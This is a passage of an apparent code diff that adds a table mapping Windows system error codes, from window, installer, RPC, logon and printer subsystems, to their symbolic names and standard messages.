+ 0x00000596: ("ERROR_JOURNAL_HOOK_SET", "The journal hook procedure is already installed."),
+ 0x00000597: ("ERROR_HOOK_NOT_INSTALLED", "The hook procedure is not installed."),
+ 0x00000598: ("ERROR_INVALID_LB_MESSAGE", "Invalid message for single-selection list box."),
+ 0x00000599: ("ERROR_SETCOUNT_ON_BAD_LB", "LB_SETCOUNT sent to non-lazy list box."),
+ 0x0000059a: ("ERROR_LB_WITHOUT_TABSTOPS", "This list box does not support tab stops."),
+ 0x0000059b: ("ERROR_DESTROY_OBJECT_OF_OTHER_THREAD", "Cannot destroy object created by another thread."),
+ 0x0000059c: ("ERROR_CHILD_WINDOW_MENU", "Child windows cannot have menus."),
+ 0x0000059d: ("ERROR_NO_SYSTEM_MENU", "The window does not have a system menu."),
+ 0x0000059e: ("ERROR_INVALID_MSGBOX_STYLE", "Invalid message box style."),
+ 0x0000059f: ("ERROR_INVALID_SPI_VALUE", "Invalid system-wide (SPI_*) parameter."),
+ 0x000005a0: ("ERROR_SCREEN_ALREADY_LOCKED", "Screen already locked."),
+ 0x000005a1: ("ERROR_HWNDS_HAVE_DIFF_PARENT", "All handles to windows in a multiple-window position structure must have the same parent."),
+ 0x000005a2: ("ERROR_NOT_CHILD_WINDOW", "The window is not a child window."),
+ 0x000005a3: ("ERROR_INVALID_GW_COMMAND", "Invalid GW_* command."),
+ 0x000005a4: ("ERROR_INVALID_THREAD_ID", "Invalid thread identifier."),
+ 0x000005a5: ("ERROR_NON_MDICHILD_WINDOW", "Cannot process a message from a window that is not a multiple document interface (MDI) window."),
+ 0x000005a6: ("ERROR_POPUP_ALREADY_ACTIVE", "Popup menu already active."),
+ 0x000005a7: ("ERROR_NO_SCROLLBARS", "The window does not have scroll bars."),
+ 0x000005a8: ("ERROR_INVALID_SCROLLBAR_RANGE", "Scroll bar range cannot be greater than MAXLONG."),
+ 0x000005a9: ("ERROR_INVALID_SHOWWIN_COMMAND", "Cannot show or remove the window in the way specified."),
+ 0x000005aa: ("ERROR_NO_SYSTEM_RESOURCES", "Insufficient system resources exist to complete the requested service."),
+ 0x000005ab: ("ERROR_NONPAGED_SYSTEM_RESOURCES", "Insufficient system resources exist to complete the requested service."),
+ 0x000005ac: ("ERROR_PAGED_SYSTEM_RESOURCES", "Insufficient system resources exist to complete the requested service."),
+ 0x000005ad: ("ERROR_WORKING_SET_QUOTA", "Insufficient quota to complete the requested service."),
+ 0x000005ae: ("ERROR_PAGEFILE_QUOTA", "Insufficient quota to complete the requested service."),
+ 0x000005af: ("ERROR_COMMITMENT_LIMIT", "The paging file is too small for this operation to complete."),
+ 0x000005b0: ("ERROR_MENU_ITEM_NOT_FOUND", "A menu item was not found."),
+ 0x000005b1: ("ERROR_INVALID_KEYBOARD_HANDLE", "Invalid keyboard layout handle."),
+ 0x000005b2: ("ERROR_HOOK_TYPE_NOT_ALLOWED", "Hook type not allowed."),
+ 0x000005b3: ("ERROR_REQUIRES_INTERACTIVE_WINDOWSTATION", "This operation requires an interactive window station."),
+ 0x000005b4: ("ERROR_TIMEOUT", "This operation returned because the timeout period expired."),
+ 0x000005b5: ("ERROR_INVALID_MONITOR_HANDLE", "Invalid monitor handle."),
+ 0x000005b6: ("ERROR_INCORRECT_SIZE", "Incorrect size argument."),
+ 0x000005b7: ("ERROR_SYMLINK_CLASS_DISABLED", "The symbolic link cannot be followed because its type is disabled."),
+ 0x000005b8: ("ERROR_SYMLINK_NOT_SUPPORTED", "This application does not support the current operation on symbolic links."),
+ 0x000005b9: ("ERROR_XML_PARSE_ERROR", "Windows was unable to parse the requested XML data."),
+ 0x000005ba: ("ERROR_XMLDSIG_ERROR", "An error was encountered while processing an XML digital signature."),
+ 0x000005bb: ("ERROR_RESTART_APPLICATION", "This application must be restarted."),
+ 0x000005bc: ("ERROR_WRONG_COMPARTMENT", "The caller made the connection request in the wrong routing compartment."),
+ 0x000005bd: ("ERROR_AUTHIP_FAILURE", "There was an AuthIP failure when attempting to connect to the remote host."),
+ 0x000005be: ("ERROR_NO_NVRAM_RESOURCES", "Insufficient NVRAM resources exist to complete the requested service. A reboot might be required."),
+ 0x000005bf: ("ERROR_NOT_GUI_PROCESS", "Unable to finish the requested operation because the specified process is not a GUI process."),
+ 0x000005dc: ("ERROR_EVENTLOG_FILE_CORRUPT", "The event log file is corrupted."),
+ 0x000005dd: ("ERROR_EVENTLOG_CANT_START", "No event log file could be opened, so the event logging service did not start."),
+ 0x000005de: ("ERROR_LOG_FILE_FULL", "The event log file is full."),
+ 0x000005df: ("ERROR_EVENTLOG_FILE_CHANGED", "The event log file has changed between read operations."),
+ 0x0000060e: ("ERROR_INVALID_TASK_NAME", "The specified task name is invalid."),
+ 0x0000060f: ("ERROR_INVALID_TASK_INDEX", "The specified task index is invalid."),
+ 0x00000610: ("ERROR_THREAD_ALREADY_IN_TASK", "The specified thread is already joining a task."),
+ 0x00000641: ("ERROR_INSTALL_SERVICE_FAILURE", "The Windows Installer Service could not be accessed. This can occur if the Windows Installer is not correctly installed. Contact your support personnel for assistance."),
+ 0x00000642: ("ERROR_INSTALL_USEREXIT", "User cancelled installation."),
+ 0x00000643: ("ERROR_INSTALL_FAILURE", "Fatal error during installation."),
+ 0x00000644: ("ERROR_INSTALL_SUSPEND", "Installation suspended, incomplete."),
+ 0x00000645: ("ERROR_UNKNOWN_PRODUCT", "This action is only valid for products that are currently installed."),
+ 0x00000646: ("ERROR_UNKNOWN_FEATURE", "Feature ID not registered."),
+ 0x00000647: ("ERROR_UNKNOWN_COMPONENT", "Component ID not registered."),
+ 0x00000648: ("ERROR_UNKNOWN_PROPERTY", "Unknown property."),
+ 0x00000649: ("ERROR_INVALID_HANDLE_STATE", "Handle is in an invalid state."),
+ 0x0000064a: ("ERROR_BAD_CONFIGURATION", "The configuration data for this product is corrupt. Contact your support personnel."),
+ 0x0000064b: ("ERROR_INDEX_ABSENT", "Component qualifier not present."),
+ 0x0000064c: ("ERROR_INSTALL_SOURCE_ABSENT", "The installation source for this product is not available. Verify that the source exists and that you can access it."),
+ 0x0000064d: ("ERROR_INSTALL_PACKAGE_VERSION", "This installation package cannot be installed by the Windows Installer service. You must install a Windows service pack that contains a newer version of the Windows Installer service."),
+ 0x0000064e: ("ERROR_PRODUCT_UNINSTALLED", "Product is uninstalled."),
+ 0x0000064f: ("ERROR_BAD_QUERY_SYNTAX", "SQL query syntax invalid or unsupported."),
+ 0x00000650: ("ERROR_INVALID_FIELD", "Record field does not exist."),
+ 0x00000651: ("ERROR_DEVICE_REMOVED", "The device has been removed."),
+ 0x00000652: ("ERROR_INSTALL_ALREADY_RUNNING", "Another installation is already in progress. Complete that installation before proceeding with this install."),
+ 0x00000653: ("ERROR_INSTALL_PACKAGE_OPEN_FAILED", "This installation package could not be opened. Verify that the package exists and that you can access it, or contact the application vendor to verify that this is a valid Windows Installer package."),
+ 0x00000654: ("ERROR_INSTALL_PACKAGE_INVALID", "This installation package could not be opened. Contact the application vendor to verify that this is a valid Windows Installer package."),
+ 0x00000655: ("ERROR_INSTALL_UI_FAILURE", "There was an error starting the Windows Installer service user interface. Contact your support personnel."),
+ 0x00000656: ("ERROR_INSTALL_LOG_FAILURE", "Error opening installation log file. Verify that the specified log file location exists and that you can write to it."),
+ 0x00000657: ("ERROR_INSTALL_LANGUAGE_UNSUPPORTED", "The language of this installation package is not supported by your system."),
+ 0x00000658: ("ERROR_INSTALL_TRANSFORM_FAILURE", "Error applying transforms. Verify that the specified transform paths are valid."),
+ 0x00000659: ("ERROR_INSTALL_PACKAGE_REJECTED", "This installation is forbidden by system policy. Contact your system administrator."),
+ 0x0000065a: ("ERROR_FUNCTION_NOT_CALLED", "Function could not be executed."),
+ 0x0000065b: ("ERROR_FUNCTION_FAILED", "Function failed during execution."),
+ 0x0000065c: ("ERROR_INVALID_TABLE", "Invalid or unknown table specified."),
+ 0x0000065d: ("ERROR_DATATYPE_MISMATCH", "Data supplied is of wrong type."),
+ 0x0000065e: ("ERROR_UNSUPPORTED_TYPE", "Data of this type is not supported."),
+ 0x0000065f: ("ERROR_CREATE_FAILED", "The Windows Installer service failed to start. Contact your support personnel."),
+ 0x00000660: ("ERROR_INSTALL_TEMP_UNWRITABLE", "The Temp folder is on a drive that is full or is inaccessible. Free up space on the drive or verify that you have write permission on the Temp folder."),
+ 0x00000661: ("ERROR_INSTALL_PLATFORM_UNSUPPORTED", "This installation package is not supported by this processor type. Contact your product vendor."),
+ 0x00000662: ("ERROR_INSTALL_NOTUSED", "Component not used on this computer."),
+ 0x00000663: ("ERROR_PATCH_PACKAGE_OPEN_FAILED", "This update package could not be opened. Verify that the update package exists and that you can access it, or contact the application vendor to verify that this is a valid Windows Installer update package."),
+ 0x00000664: ("ERROR_PATCH_PACKAGE_INVALID", "This update package could not be opened. Contact the application vendor to verify that this is a valid Windows Installer update package."),
+ 0x00000665: ("ERROR_PATCH_PACKAGE_UNSUPPORTED", "This update package cannot be processed by the Windows Installer service. You must install a Windows service pack that contains a newer version of the Windows Installer service."),
+ 0x00000666: ("ERROR_PRODUCT_VERSION", "Another version of this product is already installed. Installation of this version cannot continue. To configure or remove the existing version of this product, use Add/Remove Programs on the Control Panel."),
+ 0x00000667: ("ERROR_INVALID_COMMAND_LINE", "Invalid command line argument. Consult the Windows Installer SDK for detailed command line help."),
+ 0x00000668: ("ERROR_INSTALL_REMOTE_DISALLOWED", "Only administrators have permission to add, remove, or configure server software during a Terminal services remote session. If you want to install or configure software on the server, contact your network administrator."),
+ 0x00000669: ("ERROR_SUCCESS_REBOOT_INITIATED", "The requested operation completed successfully. The system will be restarted so the changes can take effect."),
+ 0x0000066a: ("ERROR_PATCH_TARGET_NOT_FOUND", "The upgrade cannot be installed by the Windows Installer service because the program to be upgraded may be missing, or the upgrade may update a different version of the program. Verify that the program to be upgraded exists on your computer and that you have the correct upgrade."),
+ 0x0000066b: ("ERROR_PATCH_PACKAGE_REJECTED", "The update package is not permitted by software restriction policy."),
+ 0x0000066c: ("ERROR_INSTALL_TRANSFORM_REJECTED", "One or more customizations are not permitted by software restriction policy."),
+ 0x0000066d: ("ERROR_INSTALL_REMOTE_PROHIBITED", "The Windows Installer does not permit installation from a Remote Desktop Connection."),
+ 0x0000066e: ("ERROR_PATCH_REMOVAL_UNSUPPORTED", "Uninstallation of the update package is not supported."),
+ 0x0000066f: ("ERROR_UNKNOWN_PATCH", "The update is not applied to this product."),
+ 0x00000670: ("ERROR_PATCH_NO_SEQUENCE", "No valid sequence could be found for the set of updates."),
+ 0x00000671: ("ERROR_PATCH_REMOVAL_DISALLOWED", "Update removal was disallowed by policy."),
+ 0x00000672: ("ERROR_INVALID_PATCH_XML", "The XML update data is invalid."),
+ 0x00000673: ("ERROR_PATCH_MANAGED_ADVERTISED_PRODUCT", "Windows Installer does not permit updating of managed advertised products. At least one feature of the product must be installed before applying the update."),
+ 0x00000674: ("ERROR_INSTALL_SERVICE_SAFEBOOT", "The Windows Installer service is not accessible in Safe Mode. Please try again when your computer is not in Safe Mode or you can use System Restore to return your machine to a previous good state."),
+ 0x00000675: ("ERROR_FAIL_FAST_EXCEPTION", "A fail fast exception occurred. Exception handlers will not be invoked and the process will be terminated immediately."),
+ 0x00000676: ("ERROR_INSTALL_REJECTED", "The app that you are trying to run is not supported on this version of Windows."),
+ 0x000006a4: ("RPC_S_INVALID_STRING_BINDING", "The string binding is invalid."),
+ 0x000006a5: ("RPC_S_WRONG_KIND_OF_BINDING", "The binding handle is not the correct type."),
+ 0x000006a6: ("RPC_S_INVALID_BINDING", "The binding handle is invalid."),
+ 0x000006a7: ("RPC_S_PROTSEQ_NOT_SUPPORTED", "The RPC protocol sequence is not supported."),
+ 0x000006a8: ("RPC_S_INVALID_RPC_PROTSEQ", "The RPC protocol sequence is invalid."),
+ 0x000006a9: ("RPC_S_INVALID_STRING_UUID", "The string universal unique identifier (UUID) is invalid."),
+ 0x000006aa: ("RPC_S_INVALID_ENDPOINT_FORMAT", "The endpoint format is invalid."),
+ 0x000006ab: ("RPC_S_INVALID_NET_ADDR", "The network address is invalid."),
+ 0x000006ac: ("RPC_S_NO_ENDPOINT_FOUND", "No endpoint was found."),
+ 0x000006ad: ("RPC_S_INVALID_TIMEOUT", "The timeout value is invalid."),
+ 0x000006ae: ("RPC_S_OBJECT_NOT_FOUND", "The object universal unique identifier (UUID) was not found."),
+ 0x000006af: ("RPC_S_ALREADY_REGISTERED", "The object universal unique identifier (UUID) has already been registered."),
+ 0x000006b0: ("RPC_S_TYPE_ALREADY_REGISTERED", "The type universal unique identifier (UUID) has already been registered."),
+ 0x000006b1: ("RPC_S_ALREADY_LISTENING", "The RPC server is already listening."),
+ 0x000006b2: ("RPC_S_NO_PROTSEQS_REGISTERED", "No protocol sequences have been registered."),
+ 0x000006b3: ("RPC_S_NOT_LISTENING", "The RPC server is not listening."),
+ 0x000006b4: ("RPC_S_UNKNOWN_MGR_TYPE", "The manager type is unknown."),
+ 0x000006b5: ("RPC_S_UNKNOWN_IF", "The interface is unknown."),
+ 0x000006b6: ("RPC_S_NO_BINDINGS", "There are no bindings."),
+ 0x000006b7: ("RPC_S_NO_PROTSEQS", "There are no protocol sequences."),
+ 0x000006b8: ("RPC_S_CANT_CREATE_ENDPOINT", "The endpoint cannot be created."),
+ 0x000006b9: ("RPC_S_OUT_OF_RESOURCES", "Not enough resources are available to complete this operation."),
+ 0x000006ba: ("RPC_S_SERVER_UNAVAILABLE", "The RPC server is unavailable."),
+ 0x000006bb: ("RPC_S_SERVER_TOO_BUSY", "The RPC server is too busy to complete this operation."),
+ 0x000006bc: ("RPC_S_INVALID_NETWORK_OPTIONS", "The network options are invalid."),
+ 0x000006bd: ("RPC_S_NO_CALL_ACTIVE", "There are no remote procedure calls active on this thread."),
+ 0x000006be: ("RPC_S_CALL_FAILED", "The remote procedure call failed."),
+ 0x000006bf: ("RPC_S_CALL_FAILED_DNE", "The remote procedure call failed and did not execute."),
+ 0x000006c0: ("RPC_S_PROTOCOL_ERROR", "A remote procedure call (RPC) protocol error occurred."),
+ 0x000006c1: ("RPC_S_PROXY_ACCESS_DENIED", "Access to the HTTP proxy is denied."),
+ 0x000006c2: ("RPC_S_UNSUPPORTED_TRANS_SYN", "The transfer syntax is not supported by the RPC server."),
+ 0x000006c4: ("RPC_S_UNSUPPORTED_TYPE", "The universal unique identifier (UUID) type is not supported."),
+ 0x000006c5: ("RPC_S_INVALID_TAG", "The tag is invalid."),
+ 0x000006c6: ("RPC_S_INVALID_BOUND", "The array bounds are invalid."),
+ 0x000006c7: ("RPC_S_NO_ENTRY_NAME", "The binding does not contain an entry name."),
+ 0x000006c8: ("RPC_S_INVALID_NAME_SYNTAX", "The name syntax is invalid."),
+ 0x000006c9: ("RPC_S_UNSUPPORTED_NAME_SYNTAX", "The name syntax is not supported."),
+ 0x000006cb: ("RPC_S_UUID_NO_ADDRESS", "No network address is available to use to construct a universal unique identifier (UUID)."),
+ 0x000006cc: ("RPC_S_DUPLICATE_ENDPOINT", "The endpoint is a duplicate."),
+ 0x000006cd: ("RPC_S_UNKNOWN_AUTHN_TYPE", "The authentication type is unknown."),
+ 0x000006ce: ("RPC_S_MAX_CALLS_TOO_SMALL", "The maximum number of calls is too small."),
+ 0x000006cf: ("RPC_S_STRING_TOO_LONG", "The string is too long."),
+ 0x000006d0: ("RPC_S_PROTSEQ_NOT_FOUND", "The RPC protocol sequence was not found."),
+ 0x000006d1: ("RPC_S_PROCNUM_OUT_OF_RANGE", "The procedure number is out of range."),
+ 0x000006d2: ("RPC_S_BINDING_HAS_NO_AUTH", "The binding does not contain any authentication information."),
+ 0x000006d3: ("RPC_S_UNKNOWN_AUTHN_SERVICE", "The authentication service is unknown."),
+ 0x000006d4: ("RPC_S_UNKNOWN_AUTHN_LEVEL", "The authentication level is unknown."),
+ 0x000006d5: ("RPC_S_INVALID_AUTH_IDENTITY", "The security context is invalid."),
+ 0x000006d6: ("RPC_S_UNKNOWN_AUTHZ_SERVICE", "The authorization service is unknown."),
+ 0x000006d7: ("EPT_S_INVALID_ENTRY", "The entry is invalid."),
+ 0x000006d8: ("EPT_S_CANT_PERFORM_OP", "The server endpoint cannot perform the operation."),
+ 0x000006d9: ("EPT_S_NOT_REGISTERED", "There are no more endpoints available from the endpoint mapper."),
+ 0x000006da: ("RPC_S_NOTHING_TO_EXPORT", "No interfaces have been exported."),
+ 0x000006db: ("RPC_S_INCOMPLETE_NAME", "The entry name is incomplete."),
+ 0x000006dc: ("RPC_S_INVALID_VERS_OPTION", "The version option is invalid."),
+ 0x000006dd: ("RPC_S_NO_MORE_MEMBERS", "There are no more members."),
+ 0x000006de: ("RPC_S_NOT_ALL_OBJS_UNEXPORTED", "There is nothing to unexport."),
+ 0x000006df: ("RPC_S_INTERFACE_NOT_FOUND", "The interface was not found."),
+ 0x000006e0: ("RPC_S_ENTRY_ALREADY_EXISTS", "The entry already exists."),
+ 0x000006e1: ("RPC_S_ENTRY_NOT_FOUND", "The entry is not found."),
+ 0x000006e2: ("RPC_S_NAME_SERVICE_UNAVAILABLE", "The name service is unavailable."),
+ 0x000006e3: ("RPC_S_INVALID_NAF_ID", "The network address family is invalid."),
+ 0x000006e4: ("RPC_S_CANNOT_SUPPORT", "The requested operation is not supported."),
+ 0x000006e5: ("RPC_S_NO_CONTEXT_AVAILABLE", "No security context is available to allow impersonation."),
+ 0x000006e6: ("RPC_S_INTERNAL_ERROR", "An internal error occurred in a remote procedure call (RPC)."),
+ 0x000006e7: ("RPC_S_ZERO_DIVIDE", "The RPC server attempted an integer division by zero."),
+ 0x000006e8: ("RPC_S_ADDRESS_ERROR", "An addressing error occurred in the RPC server."),
+ 0x000006e9: ("RPC_S_FP_DIV_ZERO", "A floating-point operation at the RPC server caused a division by zero."),
+ 0x000006ea: ("RPC_S_FP_UNDERFLOW", "A floating-point underflow occurred at the RPC server."),
+ 0x000006eb: ("RPC_S_FP_OVERFLOW", "A floating-point overflow occurred at the RPC server."),
+ 0x000006ec: ("RPC_X_NO_MORE_ENTRIES", "The list of RPC servers available for the binding of auto handles has been exhausted."),
+ 0x000006ed: ("RPC_X_SS_CHAR_TRANS_OPEN_FAIL", "Unable to open the character translation table file."),
+ 0x000006ee: ("RPC_X_SS_CHAR_TRANS_SHORT_FILE", "The file containing the character translation table has fewer than 512 bytes."),
+ 0x000006ef: ("RPC_X_SS_IN_NULL_CONTEXT", "A null context handle was passed from the client to the host during a remote procedure call."),
+ 0x000006f1: ("RPC_X_SS_CONTEXT_DAMAGED", "The context handle changed during a remote procedure call."),
+ 0x000006f2: ("RPC_X_SS_HANDLES_MISMATCH", "The binding handles passed to a remote procedure call do not match."),
+ 0x000006f3: ("RPC_X_SS_CANNOT_GET_CALL_HANDLE", "The stub is unable to get the remote procedure call handle."),
+ 0x000006f4: ("RPC_X_NULL_REF_POINTER", "A null reference pointer was passed to the stub."),
+ 0x000006f5: ("RPC_X_ENUM_VALUE_OUT_OF_RANGE", "The enumeration value is out of range."),
+ 0x000006f6: ("RPC_X_BYTE_COUNT_TOO_SMALL", "The byte count is too small."),
+ 0x000006f7: ("RPC_X_BAD_STUB_DATA", "The stub received bad data."),
+ 0x000006f8: ("ERROR_INVALID_USER_BUFFER", "The supplied user buffer is not valid for the requested operation."),
+ 0x000006f9: ("ERROR_UNRECOGNIZED_MEDIA", "The disk media is not recognized. It may not be formatted."),
+ 0x000006fa: ("ERROR_NO_TRUST_LSA_SECRET", "The workstation does not have a trust secret."),
+ 0x000006fb: ("ERROR_NO_TRUST_SAM_ACCOUNT", "The security database on the server does not have a computer account for this workstation trust relationship."),
+ 0x000006fc: ("ERROR_TRUSTED_DOMAIN_FAILURE", "The trust relationship between the primary domain and the trusted domain failed."),
+ 0x000006fd: ("ERROR_TRUSTED_RELATIONSHIP_FAILURE", "The trust relationship between this workstation and the primary domain failed."),
+ 0x000006fe: ("ERROR_TRUST_FAILURE", "The network logon failed."),
+ 0x000006ff: ("RPC_S_CALL_IN_PROGRESS", "A remote procedure call is already in progress for this thread."),
+ 0x00000700: ("ERROR_NETLOGON_NOT_STARTED", "An attempt was made to logon, but the network logon service was not started."),
+ 0x00000701: ("ERROR_ACCOUNT_EXPIRED", "The user's account has expired."),
+ 0x00000702: ("ERROR_REDIRECTOR_HAS_OPEN_HANDLES", "The redirector is in use and cannot be unloaded."),
+ 0x00000703: ("ERROR_PRINTER_DRIVER_ALREADY_INSTALLED", "The specified printer driver is already installed."),
+ 0x00000704: ("ERROR_UNKNOWN_PORT", "The specified port is unknown."),
+ 0x00000705: ("ERROR_UNKNOWN_PRINTER_DRIVER", "The printer driver is unknown."),
+ 0x00000706: ("ERROR_UNKNOWN_PRINTPROCESSOR", "The print processor is unknown."),
+ 0x00000707: ("ERROR_INVALID_SEPARATOR_FILE", "The specified separator file is invalid."),
+ 0x00000708: ("ERROR_INVALID_PRIORITY", "The specified priority is invalid."),
+ 0x00000709: ("ERROR_INVALID_PRINTER_NAME", "The printer name is invalid."),
+ 0x0000070a: ("ERROR_PRINTER_ALREADY_EXISTS", "The printer already exists."),
+ 0x0000070b: ("ERROR_INVALID_PRINTER_COMMAND", "The printer command is invalid."),
+ 0x0000070c: ("ERROR_INVALID_DATATYPE", "The specified datatype is invalid."),
+ 0x0000070d: ("ERROR_INVALID_ENVIRONMENT", "The environment specified is invalid."),
+ 0x0000070e: ("RPC_S_NO_MORE_BINDINGS", "There are no more bindings."),
+ 0x0000070f: ("ERROR_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT", "The account used is an interdomain trust account. Use your global user account or local user account to access this server."),
+ 0x00000710: ("ERROR_NOLOGON_WORKSTATION_TRUST_ACCOUNT", "The account used is a computer account. Use your global user account or local user account to access this server."),
+ 0x00000711: ("ERROR_NOLOGON_SERVER_TRUST_ACCOUNT", "The account used is a server trust account. Use your global user account or local user account to access this server."),
+ 0x00000712: ("ERROR_DOMAIN_TRUST_INCONSISTENT", "The name or security ID (SID) of the domain specified is inconsistent with the trust information for that domain."),
+ 0x00000713: ("ERROR_SERVER_HAS_OPEN_HANDLES", "The server is in use and cannot be unloaded."),
+ 0x00000714: ("ERROR_RESOURCE_DATA_NOT_FOUND", "The specified image file did not contain a resource section."),
+ 0x00000715: ("ERROR_RESOURCE_TYPE_NOT_FOUND", "The specified resource type cannot be found in the image file."),
+ 0x00000716: ("ERROR_RESOURCE_NAME_NOT_FOUND", "The specified resource name cannot be found in the image file."),
+ 0x00000717: ("ERROR_RESOURCE_LANG_NOT_FOUND", "The specified resource language ID cannot be found in the image file."),
+ 0x00000718: ("ERROR_NOT_ENOUGH_QUOTA", "Not enough quota is available to process this command."),
+ 0x00000719: ("RPC_S_NO_INTERFACES", "No interfaces have been registered."),
+ 0x0000071a: ("RPC_S_CALL_CANCELLED", "The remote procedure call was cancelled."),
+ 0x0000071b: ("RPC_S_BINDING_INCOMPLETE", "The binding handle does not contain all required information."),
+ 0x0000071c: ("RPC_S_COMM_FAILURE", "A communications failure occurred during a remote procedure call."),
+ 0x0000071d: ("RPC_S_UNSUPPORTED_AUTHN_LEVEL", "The requested authentication level is not supported."),
+ 0x0000071e: ("RPC_S_NO_PRINC_NAME", "No principal name registered."),
+ 0x0000071f: ("RPC_S_NOT_RPC_ERROR", "The error specified is not a valid Windows RPC error code."),
+ 0x00000720: ("RPC_S_UUID_LOCAL_ONLY", "A UUID that is valid only on this computer has been allocated."),
+ 0x00000721: ("RPC_S_SEC_PKG_ERROR", "A security package specific error occurred."),
+ 0x00000722: ("RPC_S_NOT_CANCELLED", "Thread is not canceled."),
+ 0x00000723: ("RPC_X_INVALID_ES_ACTION", "Invalid operation on the encoding/decoding handle."),
+ 0x00000724: ("RPC_X_WRONG_ES_VERSION", "Incompatible version of the serializing package."),
+ 0x00000725: ("RPC_X_WRONG_STUB_VERSION", "Incompatible version of the RPC stub."),
+ 0x00000726: ("RPC_X_INVALID_PIPE_OBJECT", "The RPC pipe object is invalid or corrupted."),
+ 0x00000727: ("RPC_X_WRONG_PIPE_ORDER", "An invalid operation was attempted on an RPC pipe object."),
+ 0x00000728: ("RPC_X_WRONG_PIPE_VERSION", "Unsupported RPC pipe version."),
+ 0x00000729: ("RPC_S_COOKIE_AUTH_FAILED", "HTTP proxy server rejected the connection because the cookie authentication failed."),
+ 0x0000076a: ("RPC_S_GROUP_MEMBER_NOT_FOUND", "The group member was not found."),
+ 0x0000076b: ("EPT_S_CANT_CREATE", "The endpoint mapper database entry could not be created."),
+ 0x0000076c: ("RPC_S_INVALID_OBJECT", "The object universal unique identifier (UUID) is the nil UUID."),
+ 0x0000076d: ("ERROR_INVALID_TIME", "The specified time is invalid."),
+ 0x0000076e: ("ERROR_INVALID_FORM_NAME", "The specified form name is invalid."),
+ 0x0000076f: ("ERROR_INVALID_FORM_SIZE", "The specified form size is invalid."),
+ 0x00000770: ("ERROR_ALREADY_WAITING", "The specified printer handle is already being waited on"),
+ 0x00000771: ("ERROR_PRINTER_DELETED", "The specified printer has been deleted."),
+ 0x00000772: ("ERROR_INVALID_PRINTER_STATE", "The state of the printer is invalid."),
+ 0x00000773: ("ERROR_PASSWORD_MUST_CHANGE", "The user's password must be changed before signing in."),
+ 0x00000774: ("ERROR_DOMAIN_CONTROLLER_NOT_FOUND", "Could not find the domain controller for this domain."),
+ 0x00000775: ("ERROR_ACCOUNT_LOCKED_OUT", "The referenced account is currently locked out and may not be logged on to."),
+ 0x00000776: ("OR_INVALID_OXID", "The object exporter specified was not found."),
+ 0x00000777: ("OR_INVALID_OID", "The object specified was not found."),
+ 0x00000778: ("OR_INVALID_SET", "The object resolver set specified was not found."),
+ 0x00000779: ("RPC_S_SEND_INCOMPLETE", "Some data remains to be sent in the request buffer."),
+ 0x0000077a: ("RPC_S_INVALID_ASYNC_HANDLE", "Invalid asynchronous remote procedure call handle."),
+ 0x0000077b: ("RPC_S_INVALID_ASYNC_CALL", "Invalid asynchronous RPC call handle for this operation."),
+ 0x0000077c: ("RPC_X_PIPE_CLOSED", "The RPC pipe object has already been closed."),
+ 0x0000077d: ("RPC_X_PIPE_DISCIPLINE_ERROR", "The RPC call completed before all pipes were processed."),
+ 0x0000077e: ("RPC_X_PIPE_EMPTY", "No more data is available from the RPC pipe."),
+ 0x0000077f: ("ERROR_NO_SITENAME", "No site name is available for this machine."),
+ 0x00000780: ("ERROR_CANT_ACCESS_FILE", "The file cannot be accessed by the system."),
+ 0x00000781: ("ERROR_CANT_RESOLVE_FILENAME", "The name of the file cannot be resolved by the system."),
+ 0x00000782: ("RPC_S_ENTRY_TYPE_MISMATCH", "The entry is not of the expected type."),
+ 0x00000783: ("RPC_S_NOT_ALL_OBJS_EXPORTED", "Not all object UUIDs could be exported to the specified entry."),
+ 0x00000784: ("RPC_S_INTERFACE_NOT_EXPORTED", "Interface could not be exported to the specified entry."),
+ 0x00000785: ("RPC_S_PROFILE_NOT_ADDED", "The specified profile entry could not be added."),
+ 0x00000786: ("RPC_S_PRF_ELT_NOT_ADDED", "The specified profile element could not be added."),
+ 0x00000787: ("RPC_S_PRF_ELT_NOT_REMOVED", "The specified profile element could not be removed."),
+ 0x00000788: ("RPC_S_GRP_ELT_NOT_ADDED", "The group element could not be added."),
+ 0x00000789: ("RPC_S_GRP_ELT_NOT_REMOVED", "The group element could not be removed."),
+ 0x0000078a: ("ERROR_KM_DRIVER_BLOCKED", "The printer driver is not compatible with a policy enabled on your computer that blocks NT 4.0 drivers."),
+ 0x0000078b: ("ERROR_CONTEXT_EXPIRED", "The context has expired and can no longer be used."),
+ 0x0000078c: ("ERROR_PER_USER_TRUST_QUOTA_EXCEEDED", "The current user's delegated trust creation quota has been exceeded."),
+ 0x0000078d: ("ERROR_ALL_USER_TRUST_QUOTA_EXCEEDED", "The total delegated trust creation quota has been exceeded."),
+ 0x0000078e: ("ERROR_USER_DELETE_TRUST_QUOTA_EXCEEDED", "The current user's delegated trust deletion quota has been exceeded."),
+ 0x0000078f: ("ERROR_AUTHENTICATION_FIREWALL_FAILED", "The computer you are signing into is protected by an authentication firewall. The specified account is not allowed to authenticate to the computer."),
+ 0x00000790: ("ERROR_REMOTE_PRINT_CONNECTIONS_BLOCKED", "Remote connections to the Print Spooler are blocked by a policy set on your machine."),
+ 0x00000791: ("ERROR_NTLM_BLOCKED", "Authentication failed because NTLM authentication has been disabled."),
+ 0x00000792: ("ERROR_PASSWORD_CHANGE_REQUIRED", "Logon Failure: EAS policy requires that the user change their password before this operation can be performed."),
+ 0x000007d0: ("ERROR_INVALID_PIXEL_FORMAT", "The pixel format is invalid."),
+ 0x000007d1: ("ERROR_BAD_DRIVER", "The specified driver is invalid."),
+ 0x000007d2: ("ERROR_INVALID_WINDOW_STYLE", "The window style or class attribute is invalid for this operation."),
+ 0x000007d3: ("ERROR_METAFILE_NOT_SUPPORTED", "The requested metafile operation is not supported."),
+ 0x000007d4: ("ERROR_TRANSFORM_NOT_SUPPORTED", "The requested transformation operation is not supported."),
+ 0x000007d5: ("ERROR_CLIPPING_NOT_SUPPORTED", "The requested clipping operation is not supported."),
+ 0x000007da: ("ERROR_INVALID_CMM", "The specified color management module is invalid."),
+ 0x000007db: ("ERROR_INVALID_PROFILE", "The specified color profile is invalid."),
+ 0x000007dc: ("ERROR_TAG_NOT_FOUND", "The specified tag was not found."),
+ 0x000007dd: ("ERROR_TAG_NOT_PRESENT", "A required tag is not present."),
+ 0x000007de: ("ERROR_DUPLICATE_TAG", "The specified tag is already present."),
+ 0x000007df: ("ERROR_PROFILE_NOT_ASSOCIATED_WITH_DEVICE", "The specified color profile is not associated with the specified device."),
+ 0x000007e0: ("ERROR_PROFILE_NOT_FOUND", "The specified color profile was not found."),
